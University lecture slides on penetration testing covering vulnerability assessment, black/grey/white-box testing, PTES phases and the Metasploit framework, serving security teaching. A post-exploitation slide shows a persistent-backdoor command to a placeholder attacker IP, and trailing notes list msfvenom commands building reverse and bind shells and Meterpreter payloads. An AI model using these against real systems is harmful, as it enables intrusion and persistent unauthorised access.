CCCU

Week-6: Cybersecurity Fundamental

Credits: 20

Module Leader: Ali Jaddoa

Lecture Name: Pentration Test (Pen Test)
CSF-P19133l
CCCU

Today

  1. Recap Vuln Assessment
  2. Pen Testing
  3. Metaspliot
CSF-P19133l
CCCU

Recap: Vulnerabilities Assessment

Vulnerability Assessment is a systematic process used to identify, quantify, and prioritise the security vulnerabilities in an information system. It aims to detect weaknesses that could be exploited by attackers.

  1. Network-Based Assessments
  2. Host-Based Assessments
  3. Web-Based Assessments
  4. Database Assessments
CSF-P19133l
CCCU

Steps in Conducting a Vulnerability Assessment

  1. Define the Scope
  2. Identify Vulnerabilities
  3. Classify and Prioritise Vulnerabilities
  4. Report Findings
  5. Remediation and Mitigation
  6. Re-assessment:
    • Continuous Monitoring
CSF-P19133l
CCCU

Penetration Testing (Pentest)

  • Pentest involves simulating cyber attacks to exploit vulnerabilities and test the effectiveness of security control.

  • An authorised attack to find vulnerabilities.

  • Why bother?

    • To discover security weaknesses that could be exploited by real attackers.
    • To provide actionable insights for improving security measures.
    • To comply with security standards and regulations that require regular testing.
CSF-P19133l
CCCU

How PenTest is different from VA

VA detects and reports vulnerabilities, while Pentest actively attempts to exploit them to understand their real-world impact and risk.
width:1OO% center

Aspect PenTest V. A.
Objective Exploits vulnerabilities. Identifies vulnerabilities.
Approach Active, real attacks. Passive, detection only.
Risk Higher, may disrupt systems. Lower, no exploitation.
Outcome Report on exploitability. List of vulnerabilities.
CSF-P19133l
CCCU

Pentest : Challanges/Issues

Challenges in Pentesting Example
Scope Creep Expanding beyond agreed testing areas.
Evasion Techniques Attackers using obfuscation to hide malware.
Time and Resource Limitations Short test duration missing deeper vulnerabilities.
False Positives/Negatives Reporting a vulnerability that doesn’t exist or missing real threats.
Legal and Ethical Concerns Testing without explicit permission in certain environments.
Rapidly Evolving Threats New zero-day exploit emerging during a pentest.
CSF-P19133l
CCCU

Time: Is there a good time to do so?

Conducting penetration tests is especially important if recently:

  • Made significant upgrades or other changes to its IT infrastructure or applications
  • Has applied security patches; or
  • Has modified end-user policies, etc.
CSF-P19133l
CCCU

Types of Penetration Testing

Each technique varies in the knowledge the tester has of the system.

  1. Black boxNo prior knowledge of the system: online banking website --> SQL-I, XSS
  2. White box – opposite of black box, the tester has an in-depth knowledge : access to the source-code, DB, etc. --> review them.
  3. Gray box – somewhere in between black and white, limited information known: a certain part.
    width:1OO% center
CSF-P19133l
CCCU
Black Box Gray Box White Box
Goal Mimic a true cyber attack Assess an organisation’s vulnerability to insider threats Simulate an attack where an attacker gains access to a privileged account
Access Level Zero access or internal information Some internal access and internal information Complete open access to applications and systems
Pros Most realistic More efficient than black-box and saves on time and money (less guesswork, more focus, balance) More comprehensive, less likely to miss a vulnerability, and faster
Cons Time consuming and more likely to miss a vulnerability(s) - More data (e.g., source code) is required to be released to the tester and more expensive
CSF-P19133l
CCCU
Scenario Pen Test Type
Scenario 1: A financial institution wants to assess its online banking portal for external threats, but only provides the pen tester with a login page URLand no additional internal information.
Scenario 2: A software development company seeks a thorough security review of a newly developed internal application, sharing full access to code, network architecture, and admin credentials.
Scenario 3: A retail business is concerned about potential insider threats and wants to test vulnerabilities in both public and internal sections of its e-commerce site. They provide limited access details.
Scenario 4: A tech startup wants to validate its network security resilience. They give the pen tester access to some but not all network documentation and system credentials.

Consider: Level of access, goal and type of vluns

CSF-P19133l
CCCU
Scenario Black, White, or Gray Explanation
1 Black Box Since the institution provides no internal details, a Black Box test simulates an external attacker’s perspective, focusing on publicly accessible vulnerabilities.
2 White Box Full internal access allows for a White Box test, ideal for an in-depth examination of code, configurations, and internal security measures.
3 Gray Box Limited access aligns with a Gray Box approach, which combines partial knowledge of the system and simulates a semi-privileged insider threat.
4 Gray Box Partial access to network details makes Gray Box testing suitable, allowing testers to simulate an attack with limited insider knowledge.
CSF-P19133l
CCCU

Penetration testing Execution Standard PTES Phases (7)

width:1OO% center

CSF-P19133l
CCCU

PTES Phases: Cont'

1. Pre-engagement

  • Determine purpose / aims of the test
  • Set the scope of the task, eg:
    • What is to included / excluded?
    • Vectors: Social Eng., physical, electronic?
    • Start and end dates
    • Third parties, eg: cloud providers, ISPs
    • Testing security and/or incident response?
CSF-P19133l
CCCU

2. Intelligence gathering

  • Levels: 1. Compliance focused, 2- Best practice focused, 3-Deep level analysis
  • Target selection
  • Open Source Intelligence OSINT
    • Passive --> Traffic never sent to target (3rd party data)
    • Semi-passive --> Normal traffic to target
    • Active --> Should be detected (port scanning, web testing)
  • Physical
  • Electronic
  • Individual
CSF-P19133l
CCCU

3. Threat modeling (Next week Lecture)

It provides clarity as far as the organisation’s risk appetite and prioritisation.

  • Business assets
  • Business processes
  • Threat agents
  • Threat capabilities
  • Compare to existing published compromises.
CSF-P19133l
CCCU

4. Vulnerability analysis

Discovering flaws in systems and applications which can be leveraged by an attacker.

  • Active
    • Scanning: ports, services
    • Banner grabbing
  • Passive
    • Metadata analysis, eg: MS Office file data
    • Network sniffing, eg: Switch cache overflow
  • Validation – correlate from different tools
  • Research – check findings with
    • Vulnerability DB, eg: NVD, and CVE
    • Vendor advisories
CSF-P19133l
CCCU

5. Exploitation

Focuses solely on establishing access to a system or resource by bypassing security restrictions.

  • Establish access to system
  • Should be a planned an precision strike
  • Identify high value target assets
  • Avoid detection - Evasive techniques
CSF-P19133l
CCCU

6. Post exploitation

Determines the value of the machine compromised and to maintain control of the machine for later use.

Area Description Example
Machine Configuration Network and connectivity settings Network interfaces, routing, DNS, VPN
Pillage Identification of valuable resources and information Programs, services, network shares
Users User-related data that could be exploited Network history, IM client data, encryption keys
Exfiltration Routes Possible paths for covertly extracting data from the system Network interfaces, VPN, cloud storage
Persistence Measures Techniques used to maintain access to a compromised system Scheduled tasks, malicious services, registry modifications
CSF-P19133l
CCCU

7. Reporting

  • Executive summary
    • Background (aims, existing risks identified)
    • Narrative on effectiveness of test
    • Risk/rank (think Traffic light colour coding)
    • Recommendations
  • Technical report
    • Details of the tests
    • Scope of the exercise
    • Report intelligence findings as :
      • Passive, Corporate, Personnel, and Vulnerability
CSF-P19133l
CCCU

Metasploit Framework (MSF)

  • A penetration testing framework used for discovering, exploiting, and validating vulnerabilities.

  • Widely used in both offensive and defensive security contexts.

    width:1OO% center

CSF-P19133l
CCCU

MSF-Architecture

Operates as a modular framework, allowing users to extend and customise its functionality.

  • Modules, Libraries, and Interfaces
  • Find Vulnerabilities and deploy Payloads
    width:1OO% center
CSF-P19133l
CCCU

MSF: Interfaces

  1. msfconsole - an interactive command-line like interface
  2. msfcli - a literal Linux command line interface
  3. msfweb - browser based interface
  4. Armitage - a GUI-based third party application
CSF-P19133l
CCCU

MSF: Libraries

  • Rex (Ruby Extension Library):

    • Provides Sockets, protocols, text transformations

  • Core (Core library / msfcore):

    • Enables exploits, sessions, and plugins to interact with the different interfaces.

  • Base (Base library / msfbase):

    • Provides wrapper routines and utility classes that you can use to easily work with the Core library.
CSF-P19133l
CCCU

MSF: Modules

width:1OO% center
Each one performs a specific action, e.g: exploitation, scanning.

  • Exploits: take advantage of system weaknesses(vulnerabilities)to deliver a payload.
  • Payloads:malicious codes, these are pieces of code executed after a successful exploit.
  • Auxiliary: Supplementary tools and commands that does not easily fit into the other categories (not exploitation), e.g. scanners, fuzzers, DoS, etc.
CSF-P19133l
CCCU

MSF: Modules

width:1OO% center

  • Evasion/Encoder: Used to convert code or information i.e. designed to re-encode payloads and exploits to avoid bad char (Null) and to enable them to get past security defense systems such AV's and IDS's.

  • Nope/NOP (No Operation): It adds a sequence of NOP instructions with no side-effects :

    • improve exploit stability by creating a "landing area" for the payload in memory, increasing the chances of successful code execution.
CSF-P19133l
CCCU

MSF: Database

Uses a database (usually PostgreSQL) to store information about the exploits, payloads, sessions, and targets. This allows for efficient tracking and management of testing results.

  • DB stores information:
    • Host data (eg: IP addresses, port status)
    • Evidence
    • Exploit results
CSF-P19133l
CCCU

Payloads

Type Description Example
Single Payloads Simple, standalone payloads that execute immediately. cmd/windows/adduser - adds a new user account
Staged Payloads Two-part payload; first connects, then downloads full payload. linux/x86/meterpreter/reverse_tcp - connects back and loads Meterpreter
Inline Payloads Combines all stages in a single payload; self-contained. windows/x64/exec - executes a custom command on the target
Shell Payloads Opens a basic command shell on the target system. cmd/windows/reverse_powershell - reverse PowerShell shell
CSF-P19133l
CCCU

MSF: Common post-exploitation activities

Activity Command Example Purpose
Maintaining Access run persistence -X -i 5 -p 4444 -r <attacker_ip> Sets a persistent backdoor that reconnects every 5 seconds.
Privilege Escalation getsystem Attempts to elevate privileges to SYSTEM on Windows.
Information Gathering sysinfo Shows system details like OS version and architecture.
CSF-P19133l
CCCU

More:

CSF-P19133l
CCCU

Lab:

  • Pen Testing using Metaspliot, see here.
CSF-P19133l

1. **Black box** – No prior knowledge of the system 2. **White box** – opposite of black box, the tester has an in-depth knowledge 3. **Gray box** – somewhere in between black and white, limited information known

![width:1OO% height:600px center](../../figures/penboxscompariosns.png)

- Others: **Post**: These are used after an exploit is successful to gather further information from the compromised system or maintain access.

| **Example of Payload** | **Purpose** | |-----------------------------------------------------------------------------------------------------------|---------------------------------------------------------------| | `msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o reverse_shell.exe` | Windows reverse shell that connects back to the attacker. | | `msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf -o reverse_shell.elf` | Linux x86 reverse shell that connects back to the attacker. | | `msfvenom -p windows/shell_bind_tcp LPORT=<target_port> -f exe -o bind_shell.exe` | Windows bind shell that listens on a port on the target. | | `msfvenom -p linux/x86/shell_bind_tcp LPORT=<target_port> -f elf -o bind_shell.elf` | Linux x86 bind shell that listens on a port on the target. | | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f exe -o meterpreter_reverse_shell.exe` | Windows Meterpreter payload that connects back to the attacker. | | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f elf -o meterpreter_reverse_shell.elf` | Linux x86 Meterpreter payload that connects back to the attacker. | | `msfvenom -p windows/meterpreter/bind_tcp LPORT=<target_port> -f exe -o meterpreter_bind_shell.exe` | Windows Meterpreter payload that listens on a port on the target. | | `msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=<target_port> -f elf -o meterpreter_bind_shell.elf` | Linux x86 Meterpreter payload that listens on a port on the target. | | `msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.php` | PHP Meterpreter payload that connects back to the attacker. | | `msfvenom -p javascript/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f js -o payload.js` | JavaScript Meterpreter payload that connects back to the attacker. | | `msfvenom -p windows/exec CMD=<command> -f exe -o exec_command.exe` | Executes a command on the target Windows system. | | `msfvenom -p linux/x86/exec CMD=<command> -f elf -o exec_command.elf` | Executes a command on the target Linux system. |

### MSF: Common Post-Exploitation Activities